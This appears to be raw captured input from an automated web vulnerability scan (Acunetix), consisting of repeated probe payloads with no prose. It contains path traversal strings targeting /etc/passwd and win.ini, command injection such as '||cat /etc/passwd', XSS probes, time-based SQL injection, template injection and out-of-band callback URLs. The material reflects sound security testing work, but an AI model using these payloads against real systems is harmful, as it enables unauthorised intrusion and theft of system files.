..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

0COrx2EV')

1

1

1

[url=http://www.acunetix.com]website security[/url]

"

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

aYQROiW0'))

"

1

1

1

1_bsTEh <ScRiPt >prompt(927237)</ScRiPt>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

||cat /etc/passwd

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

/etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

&dir

-1)

1

1

http://hitcHpAmMpCdO.bxss.me/

1

1

1

-1))

comments

'&dir&'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

"&dir&"

comments

DdmYxZxV'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://www.acunetix.tst

'"

1

ESsz39H7')

|dir

1

comments/.

<!--

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

T5G1sA4q'))

'|dir

1

1

1

1'"()&%<ScRiPt >prompt(976559)</ScRiPt>

1

1

1

1

1

1

"|dir

file:///etc/passwd

'"()&%<ScRiPt >prompt(912698)</ScRiPt>

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1_927682

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu10642\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10642

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux10734\xc0\xbez1\xc0\xbcz2a\x90bcxuca10734

1

1

1

................windowswin.ini

1

1<ScRiPt >prompt(913215)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

response.write(9956162*9878648)

1<script>prompt(971029)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(944304)</ScRiPt>

1

'+response.write(9956162*9878648)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936181></ScRiPt>

1

../../../../../../../../../../etc/passwd

"+response.write(9956162*9878648)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt >prompt(994452)</ScRiPt>

'&cat /etc/passwd&'

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

"&cat /etc/passwd&"

${99137+99340}

1<video><source onerror="javascript:prompt(947125)">

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(902885)"></g></svg>

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

cat /etc/passwd

1<div style=width:expression(prompt(922665))>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n960380=v932587

1

)

`cat /etc/passwd`

WEB-INF/web.xml

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

1<iframe src='data:text/html

1

1

1

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<body onload=prompt(920838)>

WEB-INF\web.xml

-1

|cat /etc/passwd#

testasp.vulnweb.com

^(#$!@#$)(()))******

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1

1

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947043)>

'|'ld

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1<img src=xyz OnErRor=prompt(918268)>

1

-1)

1

"|"ld

"

1<img/src=">" onerror=alert(925207)>

-1))

1

1

1

1

/etc/passwd

5GRYNgOq'

${@print(md5(acunetix_wvs_security_test))}

1<ScRiPt%20>prompt(978853)</sCripT>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://hit21dOKsr0St.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

'

acunetix_wvs_invalid_filename

1

1

1&lt

tnDkyiwY')

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"

jRTLcTjz'))

\xf6<img acu onmouseover=prompt(983410) //\xf6>

1

comments

||cat /etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://www.acunetix.tst

'"

1<input autofocus onfocus=prompt(994709)>

-1

&dir

1

comments

1

1'"()&%<ScRiPt >prompt(971148)</ScRiPt>

<!--

1

'&dir&'

1

-1)

<a href='http://www.acunetix.com'>website security</a>

comments/.

1

'"()&%<ScRiPt >prompt(960016)</ScRiPt>

file:///etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

1

-1))

"&dir&"

1

1_HmVOr <ScRiPt >prompt(954416)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1_951662

1

|dir

62cNTBre'

1

1

WEB-INF/web.xml

1

5beIzevf')

'|dir

1

WEB-INF\web.xml

1

I1azDAwA'))

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

acu6303\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6303

1

1

1

acux3206\xc0\xbez1\xc0\xbcz2a\x90bcxuca3206

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(963179)</ScRiPt>

1

1

1<script>prompt(949191)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1

1<ScRiPt >prompt(967847)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?964770></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(947334)</ScRiPt>

1

1<video><source onerror="javascript:prompt(955965)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(975491)"></g></svg>

1

1

1<div style=width:expression(prompt(959547))>

1

1

response.write(9019957*9787493)

1

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

&cat /etc/passwd&

1

1

'+response.write(9019957*9787493)+'

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(931096)>

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

"+response.write(9019957*9787493)+"

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(945264)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

1<img src=xyz OnErRor=prompt(959812)>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

cat /etc/passwd

1

1

${99397+100317}

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img/src=">" onerror=alert(902841)>

1

1

1

1

`cat /etc/passwd`

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(918999)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n952899=v924230

|cat /etc/passwd#

1

-1)

)

1

1

1some_inexistent_file_with_long_name%00.jpg

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

!(()&&!|*|*|

-1))

'|'ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(970696) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

^(#$!@#$)(()))******

/etc/passwd

1

'"()

vFCOfQOw'

"|"ld

1

1

testasp.vulnweb.com

1<input autofocus onfocus=prompt(903585)>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

IdX210cq')

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

<a href='http://www.acunetix.com'>website security</a>

"

1

'

1

OiIsxDLf'))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

[url=http://www.acunetix.com]website security[/url]

1

1

-1

"

1

1

1

http://hitNyTUkZzTNm.bxss.me/

1_DNiPY <ScRiPt >prompt(921499)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

-1)

1

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

1

-1))

1

file:///etc/passwd

1

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

c5V6iW60'

1

/\../\../\../\../\../\../\../etc/passwd

1

1

75nI6zNA')

comments

http://www.acunetix.tst

'&dir&'

1

gVFFu1vX'))

1

WEB-INF/web.xml

'"

1

1

"&dir&"

1'"()&%<ScRiPt >prompt(931518)</ScRiPt>

comments/.

1

1

1

WEB-INF\web.xml

<!--

1

|dir

1

'"()&%<ScRiPt >prompt(921293)</ScRiPt>

1

'|dir

1

../../../../../../../../../../windows/win.ini

1

1_948627

1

1

"|dir

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

acu2504\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2504

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acux7262\xc0\xbez1\xc0\xbcz2a\x90bcxuca7262

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(993240)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<script>prompt(962407)</script>

1

1

1<ScRiPt >prompt(981415)</ScRiPt>

1

response.write(9652132*9487077)

1

1

1

WEB-INF/web.xml

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?944120></ScRiPt>

'+response.write(9652132*9487077)+'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

"+response.write(9652132*9487077)+"

1

1<ScRiPt >prompt(940416)</ScRiPt>

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1<video><source onerror="javascript:prompt(948054)">

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939965)"></g></svg>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1<div style=width:expression(prompt(910615))>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

${100167+99328}

1<iframe src='data:text/html

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<body onload=prompt(980052)>

1&n901084=v913554

-1

1

1

'|'ld

)

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(928641)>

1

1

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<img src=xyz OnErRor=prompt(960990)>

-1))

'"()

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

testasp.vulnweb.com

1<img/src=">" onerror=alert(997271)>

1

1

'

1

dqhcNCMp'

'

1

/etc/passwd

1<ScRiPt%20>prompt(999443)</sCripT>

1

1

"

KdqROXmG')

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1&lt

xcyi3v8d'))

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

1

&dir

\xf6<img acu onmouseover=prompt(942515) //\xf6>

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

acunetix_wvs_invalid_filename

http://hitYhM22tO1io.bxss.me/

-1)

1<input autofocus onfocus=prompt(912926)>

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

"&dir&"

1

<a href='http://www.acunetix.com'>website security</a>

-1))

comments

1

http://www.acunetix.tst

1

|dir

comments

w3fGKHWK'

1'"()&%<ScRiPt >prompt(967440)</ScRiPt>

'"

[url=http://www.acunetix.com]website security[/url]

1

comments/.

'|dir

1

1

file:///etc/passwd

1_Qibqc <ScRiPt >prompt(968405)</ScRiPt>

<!--

'"()&%<ScRiPt >prompt(926275)</ScRiPt>

Bn5kLZk0')

1

1

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1

7P6gbpj6'))

1

1_902675

1

1

1

1

1

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu4515\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4515

../../../../../../../../../../windows/win.ini.jpg

1

acux2904\xc0\xbez1\xc0\xbcz2a\x90bcxuca2904

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(967736)</ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(972278)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(919139)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?923382></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(974644)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9383626*9115349)

1<video><source onerror="javascript:prompt(904854)">

1

1

1

&cat /etc/passwd&

'+response.write(9383626*9115349)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(935269)"></g></svg>

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9383626*9115349)+"

1

1

1

1<div style=width:expression(prompt(934860))>

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

1<iframe src='data:text/html

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

1<body onload=prompt(984687)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

${99736+100133}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963898)>

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1

1<img src=xyz OnErRor=prompt(924503)>

)

1&n938467=v965703

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1

1<img/src=">" onerror=alert(946254)>

1

!(()&&!|*|*|

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

bIQwoVeP'

"|"ld

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<ScRiPt%20>prompt(950582)</sCripT>

1

1

^(#$!@#$)(()))******

'

atCGxD7G')

1&lt

1

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

QM9YADwu'))

"

1

1

1

-1

\xf6<img acu onmouseover=prompt(994092) //\xf6>

1

1

'

1

1

1

${@print(md5(acunetix_wvs_security_test))}

/etc/passwd

-1)

1

acunetix_wvs_invalid_filename

1<input autofocus onfocus=prompt(969599)>

"

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

ym883Uil'

<a href='http://www.acunetix.com'>website security</a>

1

comments

http://hitIiszeEpEIG.bxss.me/

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

[url=http://www.acunetix.com]website security[/url]

B7rKef3r')

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

comments/.

uvCVyBFj'))

1_vdV7e <ScRiPt >prompt(947938)</ScRiPt>

http://www.acunetix.tst

1

'"

1

1

'&dir&'

1

1'"()&%<ScRiPt >prompt(970911)</ScRiPt>

1

1

<!--

1

1

file:///etc/passwd

1

1

1

1

'"()&%<ScRiPt >prompt(901149)</ScRiPt>

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

1

1

|dir

1_997330

1

1

1

WEB-INF/web.xml

1

1

'|dir

1

WEB-INF\web.xml

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acu3127\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3127

../../../../../../../../../../windows/win.ini.jpg

1

1

acux6054\xc0\xbez1\xc0\xbcz2a\x90bcxuca6054

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(927296)</ScRiPt>

1

1

................windowswin.ini

1

1

1

1<script>prompt(948454)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(957827)</ScRiPt>

response.write(9361475*9646545)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'+response.write(9361475*9646545)+'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983445></ScRiPt>

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<ScRiPt >prompt(914467)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"+response.write(9361475*9646545)+"

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<video><source onerror="javascript:prompt(911913)">

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946753)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<div style=width:expression(prompt(969294))>

WEB-INF\web.xml

1

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

${99860+100378}

1

1

1

1

1<iframe src='data:text/html

`cat /etc/passwd`

-1)

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n904446=v968383

|cat /etc/passwd#

-1))

)

1<body onload=prompt(953291)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(905588)>

'|'ld

HyFF3PVw'

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

ssMkH4Ow')

1<img src=xyz OnErRor=prompt(905383)>

"|"ld

1

1

1

testasp.vulnweb.com

1

/etc/passwd

"

1

1<img/src=">" onerror=alert(976152)>

UVqPAv7h'))

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1<ScRiPt%20>prompt(956435)</sCripT>

1

"

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1&lt

-1)

http://hitVRceFYT8lE.bxss.me/

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

\xf6<img acu onmouseover=prompt(970289) //\xf6>

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

-1))

&dir

1

1<input autofocus onfocus=prompt(974819)>

1

http://www.acunetix.tst

4Pcu0Zw2'

'&dir&'

'"

1

file:///etc/passwd

EZKzx0oH')

1'"()&%<ScRiPt >prompt(918519)</ScRiPt>

1

<a href='http://www.acunetix.com'>website security</a>

comments

/\../\../\../\../\../\../\../etc/passwd

1

1

"&dir&"

<!--

RmmTNw8Y'))

comments

1

[url=http://www.acunetix.com]website security[/url]

'"()&%<ScRiPt >prompt(907275)</ScRiPt>

WEB-INF/web.xml

|dir

1

1

1

comments/.

1_912748

1

1_Z3WkU <ScRiPt >prompt(935629)</ScRiPt>

WEB-INF\web.xml

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

"|dir

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acu1288\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1288

1

1

................windowswin.ini

acux7278\xc0\xbez1\xc0\xbcz2a\x90bcxuca7278

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(943646)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(961315)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(923461)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?923837></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(961117)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(969793)">

1

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(908380)"></g></svg>

1

WEB-INF\web.xml

1

1

1<div style=width:expression(prompt(941224))>

response.write(9391692*9085117)

1

1

1

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

'+response.write(9391692*9085117)+'

1

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

1<body onload=prompt(907783)>

"+response.write(9391692*9085117)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(964063)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(921416)>

cat /etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

${100458+99039}

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(953925)>

1

-1

1

`cat /etc/passwd`

1&n980547=v975448

1

1some_inexistent_file_with_long_name%00.jpg

)

-1)
